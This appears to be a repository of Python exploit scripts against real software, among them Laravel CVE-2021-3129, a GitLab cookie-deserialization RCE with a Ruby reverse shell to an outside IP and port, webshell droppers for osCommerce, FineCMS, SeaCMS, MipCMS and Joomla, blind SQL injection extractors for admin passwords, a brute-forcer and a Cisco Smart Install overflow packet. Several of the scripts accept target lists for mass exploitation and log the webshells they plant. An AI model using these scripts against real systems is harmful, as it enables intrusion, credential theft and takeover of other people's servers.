├── Laravel ├── README.md └── CVE-2021-3129.py ├── README.md ├── 云分发app.py ├── sql_hdwiki6.py ├── Gitlab └── gitlab_cookie_rce.py ├── osCommerce └── osCommerce_rce.py ├── finecms ├── data2_getshell.py ├── down_file_getshell.py └── finecms.py ├── seacms ├── v6-45.py ├── v6-54.py └── v6-55.py ├── DVWA-BruteForce.py ├── CVE-2018-0171.py ├── Mipcms └── mipcms_3.1.0.py ├── maccms_sql.py └── Joomla └── joomla_unserialize.py /Laravel/README.md: -------------------------------------------------------------------------------- 1 | python3 exp.py url 'ps -ef' 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Python-Tools 2 | Some tools written using python script 3 | -------------------------------------------------------------------------------- /云分发app.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | # 3 | #Lighthouse.php是在本目录下要上传的文件 4 | # 5 | # 6 | import requests 7 | from requests_toolbelt import MultipartEncoder 8 | requests.packages.urllib3.disable_warnings() 9 | def exp(url): 10 | urls = url + '/source/pack/upload/index-uplog.php' 11 | m = MultipartEncoder( 12 | fields={'time': 'test', 'app': ( 13 | 'Lighthouse.php', open("./Lighthouse.php", 'rb'), 'image/jpeg')} 14 | ) 15 | header = { 16 | "Connection": "close", 17 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36", 18 | "Content-Type": m.content_type, 19 | "Accept": "*/*", 20 | "Accept-Language": "zh-CN,zh;q=0.9" 21 | } 22 | requests.request("POST", urls, verify=False, data=m, headers=header, timeout=10) 23 | 24 | exp("http://127.0.0.1") 25 | -------------------------------------------------------------------------------- /sql_hdwiki6.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | import time 3 | import httplib 4 | payloads = list('1234567890abcdefghijklmnopqrstuvwxyz')#匹配用到的字符串 5 | val ='' 6 | Cookies = 'hd_sid=pUQ1Aq; PHPSESSID=jatvti3nlm2ro3i7oscke307e0; hd_auth=fa04EhT6qA%2BHMlu7IOesKoc8Xs%2F5b%2Fd18B4obJ17nm7F%2BvPbknFWVkAx1u4CLLl75EzncqWZRI94cSDMjJEV' 7 | url = '/index.php?user-login' 8 | for i in xrange(1,32): 9 | for payload in payloads: 10 | header ={ 11 | 'Cookie':Cookies, 12 | 'referer':"'where if(substr((select password from wiki_user where username='admin'),"+str(i)+",1)='"+payload+"',sleep(3),0)#", 13 | } 14 | try: 15 | conn = httplib.HTTPConnection('sb.com',timeout=5) 16 | conn.request(method='GET',url=url,headers=header) 17 | start = time.clock() 18 | html_doc=conn.getresponse().read() 19 | end = time.clock() 20 | dely=end-start 21 | #print dely 22 | if((dely)>2): 23 | val+=payload 24 | break 25 | except Exception as e: 26 | pass 27 | finally: 28 | conn.close() 29 | 30 | print 'password:'+val 31 | -------------------------------------------------------------------------------- /Gitlab/gitlab_cookie_rce.py: -------------------------------------------------------------------------------- 1 | from hashlib import pbkdf2_hmac,sha1 2 | import base64 3 | import hmac 4 | import requests 5 | import urllib3 6 | urllib3.disable_warnings() 7 | key = pbkdf2_hmac( 8 | hash_name = 'sha1', 9 | password = b"3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3", #secret_key_base 10 | salt = b"signed cookie", 11 | iterations = 1000, 12 | dklen = 64 13 | ) 14 | ip = '10.10.14.8' 15 | port = '4444' 16 | code='\x04\bo:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\t:\x0E@instanceo:\bERB\b:\t@srcI\"\x01\x80`ruby -rsocket -e \'exit if fork;c=TCPSocket.new(\"'+ip+'\",'+port+');while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\'`\x06:\x06ET:\x0E@filenameI\"\x061\x06;\tT:\f@linenoi\x06:\f@method:\vresult:\t@varI\"\f@result\x06;\tT:\x10@deprecatorIu:\x1FActiveSupport::Deprecation\x00\x06;\tT' 17 | 18 | cookie_signature = hmac.new(key, base64.b64encode(code), sha1) 19 | payload =base64.b64encode(code)+'--'+cookie_signature.hexdigest() 20 | cookies = {'experimentation_subject_id':payload} 21 | res = requests.get("https://git.laboratory.htb/users/sign_in",cookies=cookies,verify=False) 22 | print payload 23 | -------------------------------------------------------------------------------- /osCommerce/osCommerce_rce.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env 2 | #author:F0rmat 3 | import sys 4 | import requests 5 | import threading 6 | def exploit(target): 7 | if sys.argv[1]== "-f": 8 | target=target[0] 9 | url1=target+"/install/install.php?step=4" 10 | data={ 11 | 'DIR_FS_DOCUMENT_ROOT': './', 12 | 'DB_DATABASE':"\');@eval($_POST['f0rmat']);echo 'F0rmat';/*" 13 | } 14 | url2=target+"install/includes/configure.php" 15 | try: 16 | requests.post(url1,data=data) 17 | verify = requests.get(url2, timeout=3) 18 | if "F0rmat" in verify.content: 19 | print 'Write success,shell url:',url2,'pass:f0rmat' 20 | with open("success.txt","a+") as f: 21 | f.write(url2+' pass:f0rmat'+"\n") 22 | else: 23 | print target,'Write failure!' 24 | except Exception, e: 25 | print e 26 | def main(): 27 | if len(sys.argv)<3: 28 | print 'python osCommerce_rce.py -h target/-f target-file ' 29 | else: 30 | if sys.argv[1] == "-h": 31 | exploit(sys.argv[2]) 32 | elif sys.argv[1] == "-f": 33 | with open(sys.argv[2], "r") as f: 34 | b = f.readlines() 35 | for i in xrange(len(b)): 36 | if not b[i] == "\n": 37 | threading.Thread(target=exploit, args=(b[i].split(),)).start() 38 | 39 | 40 | 41 | if __name__ == '__main__': 42 | main() 43 | -------------------------------------------------------------------------------- /finecms/data2_getshell.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | ''' 3 | 仿照了前辈的一些模式,有什么可以改进欢迎跟我交流 4 | ''' 5 | import sys 6 | import requests 7 | import threading 8 | def exploit(target): 9 | if sys.argv[1]== "-f": 10 | target=target[0] 11 | payload = "/index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467¶m=update_avatar&file=data:image/php;base64,RjBybWF0PD9waHAgcGhwaW5mbygpOz8+" 12 | url = target+payload 13 | shell = target+'/uploadfile/member/0/0x0.php' 14 | try: 15 | requests.get(url, timeout=3) 16 | verify = requests.get(shell, timeout=3) 17 | if verify.status_code == 200: 18 | print 'Write success,shell url:',shell 19 | with open("success.txt","a+") as f: 20 | f.write(shell+"\n") 21 | else: 22 | print 'Oh!Sorry,Write failure!' 23 | except Exception, e: 24 | print e 25 | def main(): 26 | if len(sys.argv)<3: 27 | print 'python data2_getshell.py -h target/-f target-file' 28 | else: 29 | if sys.argv[1] == "-h": 30 | exploit(sys.argv[2]) 31 | elif sys.argv[1] == "-f": 32 | with open(sys.argv[2], "r") as f: 33 | b = f.readlines() 34 | for i in xrange(len(b)): 35 | if not b[i] == "\n": 36 | threading.Thread(target=exploit, args=(b[i].split(),)).start() 37 | 38 | 39 | 40 | if __name__ == '__main__': 41 | main() 42 | -------------------------------------------------------------------------------- /seacms/v6-45.py: -------------------------------------------------------------------------------- 1 | ''' 2 | author:F0rmat 3 | ''' 4 | 5 | import sys 6 | import requests 7 | import threading 8 | def exploit(target): 9 | if sys.argv[1]== "-f": 10 | target=target[0] 11 | url=target+"/search.php" 12 | payload = {"searchtype":5,"order":"}{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}","func":"assert","cmd":"fwrite(fopen('shell.php','w'),'f0rmat');"} 13 | shell = target+'/shell.php' 14 | try: 15 | r=requests.post(url,data=payload) 16 | verify = requests.get(shell, timeout=3) 17 | if "f0rmat" in verify.content: 18 | print 'Write success,shell url:',shell,'pass:f0rmat' 19 | with open("success.txt","a+") as f: 20 | f.write(shell+' pass:f0rmat'+"\n") 21 | else: 22 | print target,'Write failure!' 23 | except Exception, e: 24 | print e 25 | def main(): 26 | if len(sys.argv)<3: 27 | print 'python v6-45.py -h target/-f target-file' 28 | else: 29 | if sys.argv[1] == "-h": 30 | exploit(sys.argv[2]) 31 | elif sys.argv[1] == "-f": 32 | with open(sys.argv[2], "r") as f: 33 | b = f.readlines() 34 | for i in xrange(len(b)): 35 | if not b[i] == "\n": 36 | threading.Thread(target=exploit, args=(b[i].split(),)).start() 37 | 38 | 39 | 40 | if __name__ == '__main__': 41 | main() 42 | -------------------------------------------------------------------------------- /DVWA-BruteForce.py: -------------------------------------------------------------------------------- 1 | from bs4 import BeautifulSoup 2 | import urllib2 3 | header={ 'Host': '192.168.59.127', 4 | 'Cache-Control': 'max-age=0', 5 | 'If-None-Match': "307-52156c6a290c0", 6 | 'If-Modified-Since': 'Mon, 05 Oct 2015 07:51:07 GMT', 7 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36', 8 | 'Accept': '*/*', 9 | 'Referer': 'http://192.168.59.127/dvwa/vulnerabilities/brute/index.php', 10 | 'Accept-Encoding': 'gzip, deflate, sdch', 11 | 'Accept-Language': 'zh-CN,zh;q=0.8', 12 | 'Cookie': 'security=high; PHPSESSID=4ac4tdpdn25suknveha54ml3i2'} 13 | requrl = "http://192.168.59.127/dvwa/vulnerabilities/brute/" 14 | 15 | def get_token(requrl,header): 16 | req = urllib2.Request(url=requrl, headers=header) 17 | response = urllib2.urlopen(req) 18 | print response.getcode(), 19 | the_page = response.read() 20 | print len(the_page) 21 | soup = BeautifulSoup(the_page, "html.parser") 22 | user_token = soup.find_all("input")[3].get("value")# get the user_token 23 | #user_token = soup.form.input.input.input.input["value"] # get the user_token 24 | return user_token 25 | 26 | 27 | user_token = get_token(requrl,header) 28 | i=0 29 | for line in open("pass.txt"): 30 | requrl = "http://192.168.59.127/dvwa/vulnerabilities/brute/"+"?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token 31 | i = i+1 32 | print i,'admin',line.strip(), 33 | user_token = get_token(requrl,header) 34 | if (i == 10): 35 | break 36 | -------------------------------------------------------------------------------- /CVE-2018-0171.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | smi_ibc_init_discovery_BoF.py 5 | ''' 6 | 7 | import socket 8 | import struct 9 | from optparse import OptionParser 10 | 11 | # Parse the target options 12 | parser = OptionParser() 13 | parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1") 14 | parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786) 15 | (options, args) = parser.parse_args() 16 | 17 | def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'): 18 | return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v 19 | 20 | def send_packet(sock, packet): 21 | sock.send(packet) 22 | 23 | def receive(sock): 24 | return sock.recv() 25 | 26 | if __name__ == "__main__": 27 | 28 | print "[*] Connecting to Smart Install Client ", options.target, "port", options.port 29 | 30 | con = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 31 | con.connect((options.target, options.port)) 32 | 33 | payload = 'BBBB' * 44 34 | shellcode = 'D' * 2048 35 | 36 | data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload 37 | 38 | tlv_1 = craft_tlv(0x00000001, data) 39 | tlv_2 = shellcode 40 | 41 | hdr = '\x00\x00\x00\x01' # msg_from 42 | hdr += '\x00\x00\x00\x01' # version 43 | hdr += '\x00\x00\x00\x07' # msg_hdr_type 44 | hdr += struct.pack('>I', len(data)) # data_length 45 | 46 | pkt = hdr + tlv_1 + tlv_2 47 | 48 | print "[*] Send a malicious packet" 49 | send_packet(con, pkt) 50 | -------------------------------------------------------------------------------- /seacms/v6-54.py: -------------------------------------------------------------------------------- 1 | ''' 2 | author:F0rmat 3 | ''' 4 | 5 | import sys 6 | import requests 7 | import threading 8 | def exploit(target): 9 | if sys.argv[1]== "-f": 10 | target=target[0] 11 | url=target+"/search.php" 12 | payload = "fwrite(fopen('shell.php','w'),'f0rmat');" 13 | data={ 14 | "searchtype":"5", 15 | "searchword":"{if{searchpage:year}", 16 | "year":":e{searchpage:area}}", 17 | "area":"v{searchpage:letter}", 18 | "letter":"al{searchpage:lang}", 19 | "yuyan":"(join{searchpage:jq}", 20 | "jq":"($_P{searchpage:ver}", 21 | "ver":"OST[9]))", 22 | "9[]":payload, 23 | } 24 | 25 | shell = target+'/shell.php' 26 | try: 27 | requests.post(url,data=data) 28 | verify = requests.get(shell, timeout=3) 29 | if "f0rmat" in verify.content: 30 | print 'Write success,shell url:',shell,'pass:f0rmat' 31 | with open("success.txt","a+") as f: 32 | f.write(shell+' pass:f0rmat'+"\n") 33 | else: 34 | print target,'Write failure!' 35 | except Exception, e: 36 | print e 37 | def main(): 38 | if len(sys.argv)<3: 39 | print 'python check_order.py.py -h target/-f target-file' 40 | else: 41 | if sys.argv[1] == "-h": 42 | exploit(sys.argv[2]) 43 | elif sys.argv[1] == "-f": 44 | with open(sys.argv[2], "r") as f: 45 | b = f.readlines() 46 | for i in xrange(len(b)): 47 | if not b[i] == "\n": 48 | threading.Thread(target=exploit, args=(b[i].split(),)).start() 49 | 50 | 51 | 52 | if __name__ == '__main__': 53 | main() 54 | -------------------------------------------------------------------------------- /seacms/v6-55.py: -------------------------------------------------------------------------------- 1 | ''' 2 | author:F0rmat 3 | ''' 4 | 5 | import sys 6 | import requests 7 | import threading 8 | def exploit(target): 9 | if sys.argv[1]== "-f": 10 | target=target[0] 11 | url=target+"/search.php?eval(join($_POST[9]))" 12 | payload = "fwrite(fopen('shell.php','w'),'f0rmat');" 13 | data={ 14 | "searchtype": "5", 15 | "9[]": payload, 16 | "searchword": "{if{searchpage:year}", 17 | "year": ":as{searchpage:area}}", 18 | "area": "s{searchpage:letter}", 19 | "letter": "ert{searchpage:lang}", 20 | "yuyan": "($_SE{searchpage:jq}", 21 | "jq": "RVER{searchpage:ver}", 22 | "ver": "[QUERY_STRING]));/*", 23 | 24 | } 25 | 26 | shell = target+'/shell.php' 27 | try: 28 | requests.post(url,data=data) 29 | verify = requests.get(shell, timeout=3) 30 | if "f0rmat" in verify.content: 31 | print 'Write success,shell url:',shell,'pass:f0rmat' 32 | with open("success.txt","a+") as f: 33 | f.write(shell+' pass:f0rmat'+"\n") 34 | else: 35 | print target,'Write failure!' 36 | except Exception, e: 37 | print e 38 | def main(): 39 | if len(sys.argv)<3: 40 | print 'python check_order.py -h target/-f target-file' 41 | else: 42 | if sys.argv[1] == "-h": 43 | exploit(sys.argv[2]) 44 | elif sys.argv[1] == "-f": 45 | with open(sys.argv[2], "r") as f: 46 | b = f.readlines() 47 | for i in xrange(len(b)): 48 | if not b[i] == "\n": 49 | threading.Thread(target=exploit, args=(b[i].split(),)).start() 50 | 51 | 52 | 53 | if __name__ == '__main__': 54 | main() 55 | -------------------------------------------------------------------------------- /finecms/down_file_getshell.py: -------------------------------------------------------------------------------- 1 | ''' 2 | author:F0rmat 3 | usage:http://getpass.cn/2018/02/28/%e9%80%9a%e6%9d%80FineCMS5.0.8%e5%8f%8a%e7%89%88%e6%9c%ac%e4%bb%a5%e4%b8%8bgetshell%e7%9a%84%e6%bc%8f%e6%b4%9e(%e6%af%8f%e5%a4%a9%e4%b8%80%e6%b4%9e) 4 | ''' 5 | import sys 6 | import random 7 | import requests 8 | import json 9 | import time 10 | 11 | def exploit(target,rtarget): 12 | username = random.randint(0, 999999) 13 | seed = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" 14 | email = [] 15 | for i in range(8): 16 | email.append(random.choice(seed)) 17 | email = ''.join(email) 18 | 19 | # step 1 register 20 | register_url = target + "/index.php?s=member&c=register&m=index" 21 | register_payload = {"back": "", "data[username]": username, "data[password]": "123456", "data[password2]": "123456", 22 | "data[email]": email + "@" + email + ".com"} 23 | # step 2 login 24 | login_url = target + "/index.php?s=member&c=login&m=index" 25 | login_payload = {"back": "", "data[username]": username, "data[password]": "123456", "data[auto]": "1"} 26 | 27 | url = target+"/index.php?s=member&c=api&m=down_file" 28 | payload = {"url":"code=ad3eXTkH4Wt084pW46p7DBSt1KX0FwthAs4o9oBH8WVi","file":rtarget} 29 | # step 3 start hacking" 30 | s = requests.session() 31 | s.post(register_url, data=register_payload) 32 | s.post(login_url, data=login_payload) 33 | res=s.post(url,data=payload).content 34 | hjson = json.loads(res) 35 | if "php" in res: 36 | print "shell:"+target+"/uploadfile/"+time.strftime("%Y%m")+"/"+hjson['name'] 37 | else: 38 | print "failure" 39 | 40 | if len(sys.argv)<5: 41 | print 'python down_file_getshell.py -h http://127.0.0.1 -r http://10.0.0.1/shell.php' 42 | else: 43 | target = sys.argv[2] 44 | rtarget = sys.argv[4] 45 | exploit(target,rtarget) 46 | -------------------------------------------------------------------------------- /Mipcms/mipcms_3.1.0.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env 2 | #author:F0rmat 3 | import sys 4 | import requests 5 | import threading 6 | def exploit(target): 7 | dbhost='192.168.1.102' 8 | dbuser = 'root' 9 | dbpw = 'root' 10 | dbport=3306 11 | dbname="test',1=>eval(file_get_contents('php://input')),'2'=>'" 12 | if sys.argv[1]== "-f": 13 | target=target[0] 14 | url1=target+"/index.php?s=/install/Install/installPost" 15 | data={ 16 | "username": "admin", 17 | "password": "admin", 18 | "rpassword": "admin", 19 | "dbport": dbport, 20 | "dbname": dbname, 21 | "dbhost": dbhost, 22 | "dbuser": dbuser, 23 | "dbpw": dbpw, 24 | } 25 | payload = "fwrite(fopen('shell.php','w'),'f0rmat');" 26 | url2=target+"/system/config/database.php" 27 | shell = target+'/system/config/shell.php' 28 | try: 29 | requests.post(url1,data=data).content 30 | requests.post(url2, data=payload) 31 | verify = requests.get(shell, timeout=3) 32 | if "f0rmat" in verify.content: 33 | print 'Write success,shell url:',shell,'pass:f0rmat' 34 | with open("success.txt","a+") as f: 35 | f.write(shell+' pass:f0rmat'+"\n") 36 | else: 37 | print target,'Write failure!' 38 | except Exception, e: 39 | print e 40 | def main(): 41 | if len(sys.argv)<3: 42 | print 'python mipcms_3.1.0.py -h target/-f target-file ' 43 | else: 44 | if sys.argv[1] == "-h": 45 | exploit(sys.argv[2]) 46 | elif sys.argv[1] == "-f": 47 | with open(sys.argv[2], "r") as f: 48 | b = f.readlines() 49 | for i in xrange(len(b)): 50 | if not b[i] == "\n": 51 | threading.Thread(target=exploit, args=(b[i].split(),)).start() 52 | 53 | 54 | 55 | if __name__ == '__main__': 56 | main() 57 | -------------------------------------------------------------------------------- /maccms_sql.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python 2 | # -*- coding:utf-8 -*- 3 | import requests 4 | import time 5 | dict = "1234567890qwertyuiopasdfghjklzxcvbnm_{}QWERTYUIOPASDFGHJKLZXCVBNM,@.?" 6 | UserName='' 7 | UserPass='' 8 | UserName_length=0 9 | url='http://sb.com/' 10 | url = url + r'/index.php?m=vod-search' 11 | def main(): 12 | global UserName 13 | global url 14 | for i in range(30): 15 | startTime = time.time() 16 | sql = "))||if((select%0bascii(length((select(m_name)``from(mac_manager))))={}),(`sleep`(3)),0)#%25%35%63".format( 17 | ord(str(i))) 18 | data = {'wd': sql} 19 | response = requests.post(url, data=data) # 发送请求 20 | if time.time() - startTime > 3: 21 | UserName_length = i 22 | print UserName_length 23 | break 24 | for num in range(1, UserName_length + 1): 25 | for i in dict: # 遍历取出字符 26 | startTime = time.time() 27 | sql = "))||if((select%0bascii(substr((select(m_name)``from(mac_manager)),{},1))={}),(`sleep`(3)),0)#%25%35%63".format( 28 | str(num), ord(i)) 29 | data = {'wd': sql} 30 | response = requests.post(url, data=data) # 发送请求 31 | print data 32 | if time.time() - startTime > 3: 33 | UserName += i 34 | break 35 | global UserPass 36 | for num in range(32): 37 | for i in dict: # 遍历取出字符 38 | startTime = time.time() 39 | sql = "))||if((select%0bascii(substr((select(m_password)``from(mac_manager)),{},1))={}),(`sleep`(3)),0)#%25%35%63".format( 40 | str(num), ord(i)) 41 | data = {'wd': sql} 42 | response = requests.post(url, data=data) # 发送请求 43 | print data 44 | if time.time() - startTime > 3: 45 | UserPass += i 46 | break 47 | print 'username:'+UserName,'password:'+UserPass 48 | if __name__ == '__main__': 49 | main() 50 | -------------------------------------------------------------------------------- /finecms/finecms.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | #author:F0rmat 3 | ''' 4 | finecms.py是全部finecms Getshell的代码文件,只要输入python finecms URL就可以全自动Getshell。 5 | exp_upload函数是用了前辈的代码,感觉写得不错,我就不再造轮子了,修改了一些获取ID,然后得到shell的地址。 6 | ''' 7 | import random 8 | import sys 9 | import requests 10 | import time 11 | 12 | url = sys.argv[1] 13 | 14 | def exp_upload(url): 15 | username = random.randint(0, 999999) 16 | seed = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" 17 | email = [] 18 | for i in range(8): 19 | email.append(random.choice(seed)) 20 | email = ''.join(email) 21 | 22 | # step 1 register 23 | # print "[+] register user" 24 | register_url = url + "/index.php?s=member&c=register&m=index" 25 | register_payload = {"back": "", "data[username]": username, "data[password]": "123456", "data[password2]": "123456", 26 | "data[email]": email + "@" + email + ".com"} 27 | # step 2 login 28 | # print "[+] user login" 29 | login_url = url + "/index.php?s=member&c=login&m=index" 30 | login_payload = {"back": "", "data[username]": username, "data[password]": "123456", "data[auto]": "1"} 31 | # step 3 attack 32 | # print "[+] loading payload" 33 | vul_url = url + "/index.php?s=member&c=account&m=upload" 34 | vul_payload = {"tx": "data:image/php;base64,RjBybWF0PD9waHAgcGhwaW5mbygpOz8+"} 35 | try: 36 | s = requests.session() 37 | s.post(register_url, data=register_payload) 38 | result2 =s.post(login_url, data=login_payload).cookies 39 | result3 = s.post(vul_url, data=vul_payload).content 40 | expid=result2.get("member_uid") 41 | if "status" in result3: 42 | print "shell:"+url+"/uploadfile/member/"+expid+"/0x0.php" 43 | else: 44 | return False 45 | except Exception, e: 46 | pass 47 | def exp_data2(target): 48 | payload = "/index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467¶m=update_avatar&file=data:image/php;base64,RjBybWF0PD9waHAgcGhwaW5mbygpOz8+" 49 | url = target+payload 50 | shell = target+'/uploadfile/member/0/0x0.php' 51 | try: 52 | requests.get(url, timeout=3) 53 | verify = requests.get(shell, timeout=3) 54 | if verify.status_code == 200: 55 | print 'Write success,shell:',shell 56 | else: 57 | print 'Oh!Sorry,Getshell failure!' 58 | except Exception, e: 59 | print e 60 | 61 | print 'using exp_upload...' 62 | exp_upload(url) 63 | time.sleep(1) 64 | print 'using exp_data2...' 65 | exp_data2(url) 66 | print 'Complete!' 67 | 68 | -------------------------------------------------------------------------------- /Joomla/joomla_unserialize.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | ''' 3 | author:F0rmat 4 | vul:Joomla! 1.5 < 3.4.5 - Object Injection Remote Command Execution 5 | ''' 6 | import requests 7 | from optparse import OptionParser 8 | 9 | 10 | def get_url(url, user_agent): 11 | headers = { 12 | 'User-Agent': user_agent 13 | } 14 | cookies = requests.get(url, headers=headers).cookies 15 | for _ in range(3): 16 | response = requests.get(url, headers=headers, cookies=cookies) 17 | return response.content 18 | 19 | 20 | def php_str_noquotes(data): 21 | "Convert string to chr(xx).chr(xx) for use in php" 22 | encoded = "" 23 | for char in data: 24 | encoded += "chr({0}).".format(ord(char)) 25 | 26 | return encoded[:-1] 27 | 28 | 29 | def generate_payload(php_payload): 30 | php_payload = "eval({0})".format(php_str_noquotes(php_payload)) 31 | 32 | terminate = '\xf0\xfd\xfd\xfd'; 33 | exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";''' 34 | injected_payload = "{};JFactory::getConfig();exit".format(php_payload) 35 | exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload) 36 | exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate 37 | 38 | return exploit_template 39 | 40 | 41 | def check(url): 42 | response = requests.get(url) 43 | return response.content 44 | 45 | 46 | def exploit(Host): 47 | turl = Host 48 | syscmd = "file_put_contents(dirname($_SERVER['SCRIPT_FILENAME']).'/shell.php',base64_decode('dnZ2PD9waHAgZXZhbCgkX1BPU1Rbenp6XSk7Pz4='));" 49 | pl = generate_payload(syscmd) 50 | try: 51 | get_url(turl, pl) 52 | url = turl + 'shell.php' 53 | if 'vvv' in check(url): 54 | print u"成功!shell为" + turl + u"shell.php,密码为zzz" 55 | with open("success.txt", "a+") as f: 56 | f.write(url + ' pass:zzz' + "\n") 57 | else: 58 | print turl+u"失败!漏洞已修补或版本不同!" 59 | except: 60 | print turl+u"失败!漏洞已修补或版本不同!" 61 | 62 | 63 | 64 | def main(): 65 | parser = OptionParser('usage %prog -H -f ') 66 | parser.add_option("-H", dest="host",type="string",help="target host e:http://xxx.com/") 67 | parser.add_option("-f", dest="file",type="string",help="target file ") 68 | (options, args) = parser.parse_args() 69 | Host = options.host 70 | file = options.file 71 | if (Host == None): 72 | if(file == None): 73 | print parser.usage 74 | exit(0) 75 | else: 76 | with open(file,'r') as tfile: 77 | for fhost in tfile.readlines(): 78 | fhost=fhost.rstrip("\n") 79 | exploit(fhost) 80 | else: 81 | exploit(Host) 82 | if __name__ == '__main__': 83 | main() 84 | -------------------------------------------------------------------------------- /Laravel/CVE-2021-3129.py: -------------------------------------------------------------------------------- 1 | # -*- coding=utf-8 -*- 2 | # Author : Crispr 3 | # Alter: zhzyker 4 | import os 5 | import requests 6 | import sys 7 | 8 | class EXP: 9 | #这里还可以增加phpggc的使用链,经过测试发现RCE5可以使用 10 | __gadget_chains = { 11 | "command":r""" 12 | php73 -d "phar.readonly=0" ./phpggc Laravel/RCE2 system 'cmd' --phar phar -o php://output | base64 -w 0 | python -c "import sys;print(''.join(['=' + hex (ord(i))[2:] + '=00' for i in sys.stdin.read()]).upper())" 13 | """ 14 | } 15 | 16 | def __vul_check(self): 17 | res = requests.get(self.__url,verify=False) 18 | if res.status_code != 405 and "laravel" not in res.text: 19 | print("[+]Vulnerability does not exist") 20 | return False 21 | return True 22 | 23 | def __payload_send(self,payload): 24 | header = { 25 | "Accept": "application/json" 26 | } 27 | data = { 28 | "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", 29 | "parameters": { 30 | "variableName": "cve20213129", 31 | "viewFile": "" 32 | } 33 | } 34 | data["parameters"]["viewFile"] = payload 35 | 36 | #print(data) 37 | res = requests.post(self.__url, headers=header, json=data, verify=False) 38 | return res 39 | 40 | def __clear_log(self): 41 | payload = "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log" 42 | return self.__payload_send(payload=payload) 43 | 44 | def __generate_payload(self,gadget_chain): 45 | generate_exp = self.__gadget_chains[gadget_chain].replace("cmd",self.cmd) 46 | #print(generate_exp) 47 | exp = "".join(os.popen(generate_exp).readlines()).replace("\n","")+ 'a' 48 | print("[+]exploit:") 49 | #print(exp) 50 | return exp 51 | 52 | def __decode_log(self): 53 | return self.__payload_send( 54 | "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log") 55 | 56 | def __unserialize_log(self): 57 | return self.__payload_send("phar://../storage/logs/laravel.log/test.txt") 58 | 59 | def __rce(self): 60 | text = str(self.__unserialize_log().text) 61 | #print(text) 62 | text = text[text.index(']'):].replace("}","").replace("]","") 63 | return text 64 | 65 | def exp(self): 66 | for gadget_chain in self.__gadget_chains.keys(): 67 | print("[*] Try to use %s for exploitation." % (gadget_chain)) 68 | self.__clear_log() 69 | self.__clear_log() 70 | self.__payload_send('A' * 2) 71 | self.__payload_send(self.__generate_payload((gadget_chain))) 72 | self.__decode_log() 73 | print("[*] " + gadget_chain + " Result:") 74 | print(self.__rce()) 75 | 76 | def __init__(self, target,cmd): 77 | self.cmd = cmd 78 | self.target = target 79 | self.__url = requests.compat.urljoin(target, "_ignition/execute-solution") 80 | if not self.__vul_check(): 81 | print("[-] [%s] is seems not vulnerable." % (self.target)) 82 | print("[*] You can also call obj.exp() to force an attack.") 83 | else: 84 | self.exp() 85 | 86 | def main(): 87 | EXP(sys.argv[1],sys.argv[2]) 88 | 89 | if __name__ == "__main__": 90 | main() 91 | --------------------------------------------------------------------------------